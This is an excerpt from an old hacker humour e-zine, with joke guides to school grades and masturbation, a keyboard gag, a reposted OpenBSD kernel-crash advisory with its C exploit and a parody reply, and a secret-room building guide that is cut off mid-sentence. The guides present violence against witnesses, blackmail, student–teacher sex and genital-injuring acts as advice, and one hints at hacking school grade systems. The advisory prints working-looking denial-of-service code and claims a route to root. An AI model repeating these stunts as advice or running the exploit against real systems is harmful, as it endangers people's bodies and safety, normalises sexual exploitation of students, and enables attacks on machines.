b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [15:. - [ Getting Good Grades in School ] [MagicTux] :. ] [magic.tux@gmx.net] :. ] ____________________________________________________________________ Here are some _very_ useful hints on how to stay out of trouble and get good grades in school. Newbie note: US: A is the best grade F is the worst grade Europe: 1 is the best grade 6 is the worst grade Oh, and by the way: http://www.fbi.gov/programs -- 0wned ];-> 1.) Don't beat people up. If you do beat people up and get sent to the principal, then react as the following explains. a) Problem: The guy you beat up points at you and says "He started!". Solution: Say something like "Even though I know this is wrong what I'm saying, I will admit that I started it, to keep the principal from having to make a heavy decision. May God forgive me for lying." b) Problem: The guy has proof that you beat him up ... and that you started it. Solution: Beat him up again and destroy all evidence ... including witnesses. See, if you kill the principal nobody will ever find out what happened. Oh, and then of course blame it on the guy you beat up. c) Problem: The guy says something like you were supposed to say in a). Solution: That guy is cool and reads b0g. Leave him alone and beat the principal up together with him. 2.) Don't take drugs in school. You might get caught and they'll tell your parents. This also goes for smoking and alcohol. Just don't do it and you'll be out of trouble. If you do decide to smoke some pot or something and you DO get caught, then try one of the following. a) Start crying and say something like 'I didn't want to, but forced me to.' b) Start crying and say something about your parents getting divorced and you being under great psychological pressure. c) Offer the principal or whoever you got sent to some of your pot. When he's high ... RUN FOR IT! d) This guy in the park next to the school came, tied you to the bench and stuck a joint in your mouth. They'll believe it. If they ask what you were doing in the park, once again RUN FOR IT! e) Say you that it was incense and never wanted to take drugs cause they are bad. f) If that person you got sent to smokes, tell them how bad smoking is and give them the 10 billion reasons why pot is healthier than cigarettes. (see some other b0g) 3.) Always do your homework! This will get you good grades in school. If you "forget" to do your homework, try the following. a) One of your 2 billion relatives died. Just remember to keep track of which of your relatives already died. They tend to get suspicious, when your dad dies for the fifth time. b) See b above. c) Be honest. Newbie note: I don't recommend to try this one, cause it will get you really unpopular and the teachers will give you bad grades. But at least you manage to stay out of trouble this way. d) Tell them about some dudes from the Russian Mafia coming and taking you to Moscow. You just got released last night 2 AM and you are still very taken away. If they don't believe you, tell them to read the newspaper. If they get out a newspaper then .... RUN FOR IT! e) Sidetrack'em. Bring up some new topic that the teacher likes and act like you're interested. This will keep them from checking for homework. 4.) Never tell anyone about your great computer skillz (unless you wanna impress some hot chick). To avoid being a hacker and having your parents called, do the following. a) Don't type fast. Anyone that can type fast is a "hacker". b) Pretend you don't know how to do a double-click. c) Haxor your computer's network. If they actually are stupid enough to keep the student's grades on the computers (which I highly doubt), then this is another way of getting good grades. If you don't get what I mean with that, you shouldn't be reading this. 5.) Be a teacher's pet. Newbie note: This will get you very unpopular. To be a teacher's pet, try the following. a) Always do your homework. b) Always agree with the teacher. c) Use high-vocab language. d) Tell the bad kids to be quiet. e) Pretend like you're eager to learn. f) Always smile at your teachers g) Join the Boy Scouts! 6.) Be smart. I don't really recommend this one, cause it's so boring and requires almost no skill. To be smart you'll be like this. I tried this a while. It gets you quite unpopular and teachers start liking you (yuck!). a) Always know the answer to every question. b) Always doing your homework (FAST!!!) c) Be a total bitch. 7.) Don't be "mean" to your teachers. Example: During French with my 120 year old lesbian transvestite french teacher in a vocabulary test, she dictates "You are stupid". I write down "tue bete" cause I'm like extremely intelligent. Then I get pissed and say, "Thanks, you too, bitch". She didn't really like that and sent me to the principal. So, don't make stupid mistakes like that one. 8.) Blackmail your teacher(s). This will guaranteedly get you good grades and it's like the coolest thing you can do. You'll get popular and you can mess up in school as much as you want. Also, your parents will be all proud of you :) All you'll need to do, is go up to your teacher and say, "I know all about your secret". There is a certain risk to it though, here are some examples of what might happen. a) The FBI comes and wants to arrest you. This problem is quite easy to solve, just blackmail them. b) The teacher knows all about your secret. Just say, "Well I know all about your OTHER secret, too". c) The teacher asks you what her "secret" is. Tell her it's too dangerous to say in this room because the FBI is listening. d) Your teacher doesn't have a secret. RUN FOR IT!!! 9.) Fuck your teacher. This will work quite often. Just remember the teacher should be of the opposite sex, unless they're gay or lesbian or bisexual. Also remember to bring a condom, cause your Boy Scouts slogan is "Be Prepared", right? So, your teacher will think you're like totally organized. DON'T GET THEM PREGNANT OR YOU'LL BE IN DEEP SHIT!!! IF YOU HAVE AIDS THEN DEFINITELY FUCK'EM!!! IF THEY HAVE AIDS FUCK'EM ANYWAY CAUSE YOU WANT GOOD GRADES!!! STOP SCREAMING!!! 10.) Ok, now we come to the final method. This one is the probably easiest and most relaxing one. BLACKMAIL your teacher. Nothing to say about it, this method is just perfect!!!!!!!!!!!! Just make sure you have enough money :)))))) b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [16:. - [ Guide to Mostly Harmless Masturbating II ] [tiller] :. ] [tiller@cyberspace.org] :. ] ____________________________________________________________________ Today we will explore the many ways of sexual pleasure, and the many talents passed on through many generations of masturbators like myself. These trade secretes will substitute a woman for the rest of your life. *The Art of Talent Talent Method One: Typing and masturbating Have you ever been on IRC, and you just get that 'urge'? Do people try and talk to you while you're in the middle of that 'urge'? With the help of a revolutionary technique, you can chat, and satisfy that 'urge'! First you need to place your left hand on the keyboard (if you use your right hand to masturbate). Place your pinky on 'f', ring finger on 'g', middle finger on 'h', and your index finger on 'j'. In this position, you are now able to reach every key on the keyboard, with a little reach and dexterity. This art form is so useful, I am currently writing this whole text with one hand, (I�m sure you don't care to hear what the other hand is doing right now). Talent Method Two: Snow Writing Picture this scene, wintertime, no body is looking, and you gotta take a piss. With a little practice you can write "Tiller RAWKS!!" with your writing utensil (penmanship and eligibility vary according to size). The trick is to write in cursive, some inexperienced wannabe's try and print, causing pain to the urethra, as they have to hold it for the next letter. Another common mistake is the act of masturbating while trying to piss. Although you satisfy two 'urges' with one act, you also get sloppy handwriting, and piss all over your leg. Talent Method Three: Late Night Homework Have you ever had to stay up late on night to do your homework? I'm sure it's happened to all of you. And I�m sure you've gotten exited doing Algebra (thinking of your 80 year old teacher) and just wanted to yank it, and finish your homework in the morning. It's happened to all of us, don't be ashamed, cept my teacher is a FOX. With the invention of a new pen (the one that makes squiggly marks, and vibrates) you can yank it harder than ever and still have neat handwriting, only to find out that 2(25x + 3x) does NOT equal 5ex. The whole trick is timing, and consistency. If you can perfectly time the up and down motion of the pen, and integrate the movements of your hand to the pen, your body movement will counteract with the motion of the pen, causing the neatness of your writing. Common mistakes have risen with the invention of this revolutionary pen. Some individuals use the pen as a vibrator, inserting it up their anus, causing the malfunction of both their rectum and the motor of the pen. (I'll illustrate the correct way to masturbate with the pen later). *Techniques of The Master Himself Technique One: Frigid Air Using the proper household items, you can implement prestige technique, and practice, to be used on the first chick you see. Here i will demonstrate the Frigid Air technique, developed by myself, with the thoughtful idea by bads3ctor. Have you ever wondered why they put those ruber edges on the doors of refrigerators? Well... now you know. First, open the fridge; next place your penis in the crack of the door, shutting it (GENTLY) and start pumping. Be aware that any jizz squirting out, WILL spoil food, so aim left of the leftovers. For the advanced level of masturbators, pull up a chair, and use the freezer. This adds to the challenge. If you aren't careful, sperm will act as glue, painfully sticking the head of your penis to the metal part of the door. If this happens, DON'T JUMP DOWN FROM THE CHAIR!! Calmly refer back to this text for further instructions, because if you don't follow this exactly, you'll never have children again. Oh, did i forget to mention, if this happens, your fucked, and i have pity on your soul. I guess all i can really suggest is that you try and lick it, not that that would help any, but that would be fucking hilarious if you where caught with your tongue, and dick stuck to the freezer door. Technique Two: Base The base method developed by Bose (maker of Bose speakers). He theorized that by turning up the base to your favorite song increases the amount of pleasure. Logically, the vibration of the speaker would guarantee a double orgasm. First pick out a cd, press play, turn the base on full blast, and cut a hole through the cloth of your speakers. Now ram it inside, and enjoy. The advantage of this method is the stealth, incorporated with the loud noise of the stereo. A common mistake made by many young individuals is turning it up WAY too high, causing parents to come in your room to tell you to turn it down. Or causing the neighbors to call the police, forcing them to bust down the door, cause you can't hear them knocking and yelling your name. This can become a sticky situation. On another note, the sticky substance that is ejaculated can cause the short out of an expensive speaker. Please masturbate with caution. Technique Three: Vibrating Pen The vibrating pen, making it's second appearance in this text today, is a very useful tool. Some kindergartners underestimate the power of 'the pen'. If only they knew, it could get them laid with their teacher, then the pen would be a revolutionary tool to get A's in ALL your classes. But for now, we're just going to illustrate the purpose of self-pleasure. As you've all read in my first GTMHM, the Brown Finger Fist Action was a popular one amongst the many readers. In this method, we advance on the Brown Finger Fist Action. By sticking the pen up your anus and masturbating at the same time, you will achieve top orgasm, screaming your lungs out cause it feels soooooooo goooood. The trick here, so not to ruin the motor, is to use protection. Any form of protection can be used here, cept for birth control pills. If you don't have a rubber with you right now, you may use a zip lock as a substitute. Although, don't use the vegetable ones. *** You could go to jail warning: Don't go to wall-mart, rip the pen out of the package, and start using this method. *** Your already in jail tip: if you go to jail, stick this up your cell mates anus, and jack him off, you'll be idolized amongst the cell mates in prison. You might be let out early if you do good with the prison officers. Technique Four: Caffinated Pepsi The caffinated pepsi method... some have tried and failed, but I�ve revolutionized the technique. The whole theory revolves around the fact, "no pain, no gain." Back when they first invented aluminum cans, little boys have tried cutting holes in the can, and try to satisfy that 'urge'. You wouldn't believe that some still do it to this day. But if you make just one slit, and fold the flaps to the side, you can get some real pleasure. Or, if you are diameterly challenged (iny winny, tinny winny, short, short cock) then you can just use the hole at the top of the can (hopefully this will finish off what nature started, but never finished). Another method revolving around the aluminum can, just fold it, and ram it in between the crack. This gives you a tight sqeeze without the sharp edges. Technique Five: CD The CD method, basically uses the CD drive. If you open your drive, lay your dick on the tray, and keep pushing that button. Some young inexperienced kids try and use the floppy drive, but it just doesn't have the same effect. I've also heard accounts of people sticking their cock in that huge hole on the tray and pressing the button. They were later rushed to the hospital where the doctors finished amputating what was left. *Fun and Games As I said in my previous GTMHM, I would discuss the fun and games of masturbating. Well here you go, special demand for all you readers. Fun and Games One: Shoots and Ladders Shoots and Ladders is not the ordinary board game that you used to play in elementary, now its a time old tradition, played in highskewl, and college. All you need for this game is a volunteer (preferably a chick) for each player, and a ladder. The object of the game, to reach the top first. Rules: Each player must have a team member; you advance one step on the ladder by having the other team member catch your ejaculated sperm in their mouth. Starting from the bottom step, advancing in turns (I suggest just having two teams. 3 teams crowds the bottom of the ladder, although, that'd be fun, trying to stay on, and jack off at the same time, h0h0). If you fall off the ladder for any reason (no pushing) then you have to start all over again from the very bottom. ***Tip: if your team member is a chick, she can strip for you, making it quicker to ejaculate. Well... in conclusion, we've discussed the many ways of self-pleasure, as well as the many talents that always come in handy. I've also introduced you to a great party game. If you come up with any other games, or already have some traditions along those lines, email me tiller@cyberspace.org May the force be with you b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [17:. - [ How to get a new keyboard ] [clover] :. ] [clover@hotmail.com] :. ] ____________________________________________________________________ 1.get mIRC on Tuesday 2.get on the IRC 3.eat junk food and drink beer while talking to chix0rs on IRC 4.spill both of the above over your keyboard while cybering with her 5.get bored 6.notice that your keyboard is dirty 7.open it up and place the plastic ( keys housing) in hot water 8.dry it again 9.screw it together again 10.eat while u do #9 11.misplace some of the lil plastic thingys that are supposed to bring the keys back up 12.get angry 13.wait till Monday 14 buy a new one 15.goto 3. what to do with your old keyboard ? 1.switch some keys and exchange your old keyboard with the one of the guy sitting next to you at work/school. 2.switch the a to an 4 ; e to 3 and so on until you have an 31337 h4x0r keyboard 3.patch the circuits so that the enter-key will send ctrl+alt+del (leet Microsoft keyboard) 4.use your old keyboard no matter what and blame all the typo you used to have on it. 5.get rid of the stupid window-hotkey that always messed up your firing in dos games. 6.If it's even a little less damaged as mine donate it !! cl0ver@hotmail.com !@#~ (most of the article is originally written intruder@cyberarmy.com) b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [18:. - [ Rloxley owned at bugtraq? ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ What follows are two entries found at bugtraq. The first posted as an advisory by none other then the infamous Rloxley himself. Not only did this advisory outrage and stir up a riot among the leet OpenBSD gimps, but it also led to some rather funny responses. The second is a post made by some gimp who totally owned him, in fact its so funny I had trouble breathing for the rest of the day at work. Rloxley claims this first post was spoofed by some lamer who wanted to make him look silly. And since b0g are listed in the �to hell with you� section that surely helps to back up Rloxleys claim of innocence, since Rloxley is in fact a true b0g fan and would never hurt our feelings like that. Nevertheless this is one hella funny read. - HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % - | | | www.hackphreak.org | | | | Version : Hackphreak advisory #2 of many | | Author : RLoxley[hackphreak / condemnation / EHAP / RSH / ZSH (soon)]| | Contributed : All of Team Hackphreak (thanks alot) & SSG | | Topic : A non-privledged user may crash an OpenBSD Operating System,| | thus rendering the system useless. | | Effected : All Operating Systems which use UVM (not MACH VM) | | * OpenBSD | | * NetBSD | | Prvt Release : November 5th, 1998 | | Released : November 5th, 2000 | | Credits : www.hackphreak.org, zsh.interniq.org, www.subterrain.net | | Check Section 1 | | Vender status : Notified | | | - HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % - Section 1 [Greets]: First and foremost, thanks to team hackphreak and SSG, great job! SSG helped during the researching of the bug (bind, aempire, cripto). This was a coordinated effort with Team Hackphreak and The Hacker Collective known as SSG. I would like to thank RootShellHackers and Team ZSH for rigorously testing on many freenets :] (ratcorpse and her great mass testing scripts, great for analysis: www.sneakerz.org/~rat < great site :) I would like to thank caddis of TESO. He started the whole OpenBSD war. Keep up the good work. Special thanks to Mixter and his TFN2k. It has made my job much easier. I would also like to thank: EHAP, Condemnation, gov-boi (hack.co.za), shinex (yf0rce :), ISS, Solar Designer, #hackphreak, #darknet, #!/bin/zsh, #condemnation, #conf, Al Hugher, Aleph1, and my parents. Section 2 [Preface]: Usually Team HackPhreak keeps our code and research quite private until we give lectures in our channel on undernet (#hackphreak). But what really annoys us, is when a very big figure in the security community acts disrespectful to the people who help build this internet infastructure. This person who I speak of, is Theo de Raadt. Theo de Raadt claims that OpenBSD hasn't experienced a local root hole in the default install for many years. During his internal security audits, they find many bugs, yet they just hide them, patch them, and never notify the public. This is very unethical on the part of the OpenBSD team. I think you guys are lame. What worrys Team Hackphreak, is how many other bugs have gone unnoticed. We have found many other exlpoitable holes in previous OpenBSD distributions, that have miraculously been patched and never revealed. Next, there is the "Three years without a remote hole in the default install". I hope this advisory breaks that aswell, because, technically: * Log into the remote host * Grab our exploit * Crash the kernel This bug is also be exploitable via NFS. Three years without a remote hole? Strike that. Section 3 [Background]: UVM is a new virtual memory system developed which is currently used in the OpenBSD Operating Systems. It is significantly better than the traditional MACH based VM. Section 4 [Problem Description]: There exists a bug in the UVM code which has blatently slipped passed the seemlessly small minded OpenBSD security auditors. The bug exists in the anonymous mapping code in UVM. This bug allows for any local user (or remote user) to crash the entire OpenBSD system, rendering it completely useless. Once the system has crashed, a local user (with access to the terminal) may in fact hack the system. The system drops into DDB (man it). DDB allows for debugging of the actual kernel. When one has access to the kernel, they can do most anything: such as reading disk buffers, reading _copyright, reading network mbuf's. So this scales to a most incredible attack, not just a DoS (if you have read through this you have now more reason to switch to Linux). A very smart attacker will: * Crash the kernel * Assume the location of the box which crashed (@ the colo) * Use DDB to gain god status A layout of the crash dump is given: * trap() * uvm_fault() * uvmfault_amapcopy() * amap_copy() * amap_alloc() ------------------------------------------------------------------ struct vm_amap * amap_alloc(sz, padsz, waitf) vaddr_t sz, padsz; int waitf; /* * amap_alloc: allocate an amap to manage "sz" bytes of anonymous VM * * => caller should ensure sz is a multiple of PAGE_SIZE * => reference count to new amap is set to one * => new amap is returned unlocked */ { struct vm_amap *amap; int slots, padslots; UVMHIST_FUNC("amap_alloc"); UVMHIST_CALLED(maphist); AMAP_B2SLOT(slots, sz); /* load slots */ AMAP_B2SLOT(padslots, padsz); ------------------------------------------------------------------ The kernel crashes in the first instance of AMAP_B2SLOT(slots, sz). ------------------------------------------------------------------ #define AMAP_B2SLOT(S,B) { \ if ((B) & (PAGE_SIZE - 1)) \ panic("AMAP_B2SLOT: invalid byte count"); \ (S) = (B) >> PAGE_SHIFT; \ } ------------------------------------------------------------------ Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have done something so stupid and all she has is an A+ and CCNA! As aempirei, bind, and cripto pointed out: Even if AMAP_B2SLOT() is patched, the bug will still exist, hence forth because later on down the yellow brick road, the kernel will crash in routines such as: * amap_splitref() * amap_lookup() So a hacker will still be able to obtain root access. No thanks to obecian for notifying Theo a wee bit early. Section 4 [The exploit]: // PUBLIC RELEASE // // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG // // This exploit is proof of concept code. It exploits the UVM bug in // all OpenBSD kernels. It can also be used to gain god access via // ddb during the crash recovery phase of OpenBSD's security structure. // // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP, // Condemnation, caddis[TESO], Solar Designer, gov-boi, // #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting) // SSG, www.subterrain.net // // PS: The exploit is broke very slightly, so this takes some knowledge ;) // // PUBLIC RELEASE #include #include #include #include #include #include #include #include #define CRASH_FILE "./f0rKb0mB" extern int errno; int main(int argc, char *argv[]) { struct exec *ehdr; struct stat statbuf; int fd; unsigned char *data; fd = open(argv[0], O_RDONLY); if (fd < 0) { perror("main() : open(argv[0]) "); exit(-1); } if (fstat(fd, &statbuf) < 0) { perror("main() : fstat() "); exit(-1); } data = (unsigned char *) malloc(statbuf.st_size); if (data == NULL) { perror("main() : malloc() "); exit(-1); } if (read(fd, data, statbuf.st_size) <= 0) { puts("main() : read() Failure"); exit(-1); } ehdr = (struct exec *) data; close(fd); unlink(CRASH_FILE); fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR); if (fd < 0) { perror("main() : open(CRASH_FILE) "); exit(-1); } ehdr->a_data += 3; if (write(fd, data, statbuf.st_size) < 0) { perror("main() : write() "); exit(-1); } close(fd); if (execlp(CRASH_FILE, NULL) < 0) { perror("main() : execlp() "); exit(-1); } return (0); } Section 5 [TO HELL WITH YOU'S]: Theo de Raadt and the OpenBSD Team Paedophiles Rascists All of #kkk on undernet All of the people who disturb my channel BoW frys / prophet b0g Scriptkiddies all over the place obecian Section 6 [Come 1 Come ALL]: Team Hackphreak invites you to undernet #hackphreak for a great learning experience. Just join us to teach and learn. But remember, HARASSMENT = BAN. www.hackphreak.org/newbie. Section 7 [Lies]: I hope this advisory brings you closer to NT / Linux, rather than OpenBSD. Linux & NT are way better anyway. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! > its a hax0r fish! Wh00ps! Now heres the reply: b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet - | | | www.dqc.org/~chris | | | | Version : Leet advisory #2666 of many | | Author : LarFoxley[famedork / condemned / ESP / AH / PPTP (soon)] | | Contributed : All of Team Leet (thanks alot) & UVM | | Topic : A non-priviledged user may gain physical access to the | | system, thus exploiting what is known in innner circles as | | "the five-finger discount" | | Effected : All Operating Systems which use a computer | | * OpenBSD, and possibly others | | Prvt Release : October 1, 1995 | | Released : November 7, 19100 | | Credits : www.whitehouse.gov, flash.bellcore.com, www.merit.edu | | Check Section 1 | | Vendor status: Raped | | | - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet - Section 1 [Grits]: First and foremost, thanks to dictionary.com, without which I would be totally lost in the world of English spelling and grammar. Thanks to my mother who bore me. This was a coordinated effort with Team Leet and The Serious Hackers known as Super Super Good. I would like to thank RootShellBadddMothers and Team SSH for rigorously testing on many stupid shell providers who don't know about the OpenBSD team's secret plans for world domination through eleet unknown bugs :] (fatcorpse and her great mass testing scripts, great for analysis: www.freshmeat.net < great site :) I would like to thank bass of BEER. He started the whole OpenBSD religion. Keep up the good work. Special thanks to obecian and his DoS 3.3 System. It has made my job so easy that I think I should not be paid anymore. I would also like to thank: NSA, CIA, FBI, Walls Fargo, WTO, Kettutytt, Satan, Dorkex (h0rze :), ISS, Solar Designer, #blowjob, #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, communism, the US Air Force, OJ Simpson, Semtex, Ebola, George W. Bush, Ralph Nader and Jello Biafra. Section 2 [Preface]: Usually, Team Leet keeps our code and research quite private until we spew our diarrhea all over your computer monitor. But, what really annoys us, is when a very big figure in the computer security community lies to the people who make him who he is. The person I speak of is Bob Dobbs. Bob Dobbs claims that OpenBSD hasn't experienced a local root hole in the default install for many years. Yet, during his internal audits, he regularly finds unfaithfulness to the church, and he never notifies the public. I think you guys are lame. You have demonstrated sins, transgressions, intemperances, vices, errors, failings, personal faults, indiscretions, lapses, trespasses, and crimes agsinst man, woman, child, law, nature and god. What worries Team Leet is that our servers might be hacked. We have found many other exploitable holes in previous OpenBSD distributions, that have miraculously been patched and never revealed. Next, there is the "Three years without a remote hole in the default install." I hope this advisory breaks that aswell, because, techinically: * Walk up to the machine * Turn it off * Unplug it * Take it with you Although we have not confirmed it, we believe this bug is also exploitable via NFS, RSH, TELNET, and SSH. Three years without a remote hoe? Strike that. Section 3 [Background]: OpenBSD is a vulnerable operating system because it runs on a computer which can be physically accessed by an intruder. It is significantly better then the traditional UNIX based OS. Section 4 [Problem Description]: There exists a bug in the physical universe which has blatently slipped passed the seemlessly feeble minded OpenBSD developers and hackphreak.org members alike. This bug allows for any local user (or remote user) to steal the entire OpenBSD system, thus rendering it completely useless. Once the system is stolen, a local user (with access to the console) may in fact remove the hard disk. The system uses a published standard, FFS. When one has access to the hard disk, they may use FFS do most anything: such as reading the disk, and writing to it, not just a DoS (if you have to read through this you have now more reason to switch to CP/M). A very smart attacker will: * Mount the hard disk * Read from it * Use RSH A layout of the hard disk is given: * Root filesystem / * Usr filesystem /usr * Home filesystem /home * Root's filesystem /root * Tmp's filesystem /tmp * Var's filesystem /var ------------------------------------------------------------------ main() { printf("hello, world\n"); /* * here, we print to the screen * this is considered a vulnerablilty because we were able to show * just how much damange can really be done with this unique * and as-of-yet-unknown method */ } Section 4 [The exploit]: // PUBLIC RELEASE // // openbsd-sucks.c by LarFoxley of Team Leet (#openbsd on efnet) & SSH // // This exploit is proof of my love for you // // Greets: NSA, CIA, FBI, Walls Fargo, WTO, EHAP, Condoms, caddis[TESO], // Kettutytt, Satan, Dorkex (h0rze :), ISS, Solar Designer, #blowjob, // #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, communism, the // US Air Force, OJ Simpson, Semtex, Ebola, George W. Bush, Ralph // Nader and Jello Biafra. // // PS: The expoit is broke very slightly, so it takes some knowledge ;) // // PUBLIC RELEASE * DO NOT DISTRIBUTE #include #include main() { prentf("hello, world!!!!!\n"); // Now that we have gained physical access, there is no more need for // actual code, because we can simply remove the hard disk at this point. // Also, if you enter the debugger, you can change the user id of the // process that you are currently using. Imagine that. } Section 5 [TO HELL WITH YOU'S]: J.R. "Bob" Dobbs, and the OpenBSD team Photographers Rapists Anyone who thinks OpenBSD is useful All of #openbsd on EFNET All of the people who have violated my sphincter BoW Scriptkiddies who don't use my scripts obecian Section 6 [Come 1 Come ALL]: Team Leet invites you to join efnet #openbsd for a great learning experience. Just join us to teach and learn. But remember, SEXUAL HARASSMENT = FAT LAWSUIT. www.dqc.org/~chris Section 7 [Lies]: I hope this advisory makes you feel warm inside. I know that Windows NT will always rule my world. I think Bill Gates is a role model for my children and their grand-children. I like eating pineapples. All OpenBSD users are paranoid schizophrenics who fall to my knees when they read this message. --- Rev. Chris Cappuccio -=- http://www.dqc.org/~chris/ "If you don't turn on to politics, politics will turn on you" - Ralph Nader b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [19:. - [ How to build your own hax0r room ] [tak] :. ] [tak@b0g.org] :. ] ____________________________________________________________________ _______ _______ _______ |\ /|( ___ )|\ /||\ /|( ___ )( ____ ) | ) ( || ( ) |( \ / )( \ / )| ( ) || ( )| | (___) || (___) | \ (_) / \ (_) / | | | || (____)| | ___ || ___ | ) _ ( ) _ ( | | | || __) | ( ) || ( ) | / ( ) \ / ( ) \ | | | || (\ ( | ) ( || ) ( |( / \ )( / \ )| (___) || ) \ \__ |/ \||/ \||/ \||/ \|(_______)|/ \__/ _______ _______ _______ _______ ( ____ )( ___ )( ___ )( ) | ( )|| ( ) || ( ) || () () | | (____)|| | | || | | || || || | | __)| | | || | | || |(_)| | | (\ ( | | | || | | || | | | | ) \ \__| (___) || (___) || ) ( | |/ \__/(_______)(_______)|/ \| # Another mindless production brought to you by ehlf, and tak. So, you want to impress friends, girls, and feds, eh? Well here is your one stop guide to living as a ninja. If you have ever been raided, or feared raiding, you can protect yourself by installing a hax0r room in your setup. Ever watched Scooby Doo, and Shaggy always leans up against a fireplace or bookshelf, and falls into a hidden passage/room? Well that is the theory behind the hax0r room. First your hax0r room should be on the bottom floor of your house, or basement. If your house is completely above ground, it may be a little harder to do, but its possible. Scenario #1: You live in a 1 story house, with no basement...This is the hardest one, but you can still make it work. If you have a small room, you can cover the entrance, and make it your own little room. The problem with this is that sometimes you can tell that there is missing space in a house, which can get bad. Another solution to this would be to leave the existing entrance to the room, but make it a smaller room, or hallway, and keep a portion of the room to yourself. This same scenario works for most houses with no basement. Digging: Another option can be to big out where you would like to work, if you are in a basement, the ideal way would be to knock out a portion of a wall in a room, and dig from there. Make sure that you dig in a place not too much weight will be forced upon, I�m not sure about how this all works, but I don�t think I would build this under my garage, 2 inches under the cement. I would give a little bit of room from the surface, and not somewhere where allot of weight will be pressed down upon. It may take some work, but it is definitely worth it. When you finish digging, you will probably want to smooth the ceiling, walls, and floor. After you get most of the dirt even, you should probably get a couple of friends to help you, and fix up the place. If you desire, this could help out a bit with ?smell? or ?water? in your pad...Get some of that plastic looking stuff that they put on dirt, and put rocks over in yards, the black stuff. Put on your walls and ceiling, and spike in with some taint spikes or something. Now you should get some 4x4" posts, and put them in the 4 corners of the room, touching the ceiling, and put them in-between at least every 8 feet. [be sure to finish reading this document before starting] Now take some 8x4' pieces of plywood, and put them on the floor, 8'long, and 4' tall. Your 4x4" beams will be 8' or less away, so you can now nail them up. The beams will stick 4 inches out from the wall...duh, so when you board up the plywood you should have about 4 inches from the wood to the dirt. You should fill this with insulation, after you wire the outlets[will discuss later]. Now you have 4 semi-cool walls, and electrical[read on]. You now should take care of the floor. Get a long piece of wood, that can go at least 2" deep, and equal the width of the room in length. Put the board up in the far end of the room, and it will isolate a section that you can poor concrete into, you can get this fairly cheap...quick dry cement or whatever. When that finishes, break the stick away, and move it a bit back, and work on the new section on cement, etc. Soon enough you will be close to finished. Now for the ceiling, you will need to be semi-ninja. Remember those 4x4 posts? Well you are going to have to get some people, and hoist a 4x8 up flat against the ceiling. After you got it up there, slid the first one into a corner, so that the corner 4x4 in the room has a corner of 